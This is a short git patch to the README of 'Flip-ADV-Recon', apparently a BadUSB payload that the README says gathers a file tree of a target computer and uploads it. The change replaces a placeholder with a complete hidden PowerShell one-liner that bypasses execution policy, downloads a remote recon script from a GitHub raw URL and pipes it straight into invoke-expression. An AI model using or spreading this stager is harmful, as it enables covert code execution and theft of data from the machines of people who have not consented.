From 7ac6e3065fbcbe6e467bf4b209718dc856c22c1a Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 17 Dec 2022 01:08:34 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-ADV-Recon/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index bbe969c..bdfa190 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -40,7 +40,7 @@ Along with TREE list of all files in the target computer is gathered and uploade * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex ```

(back to top)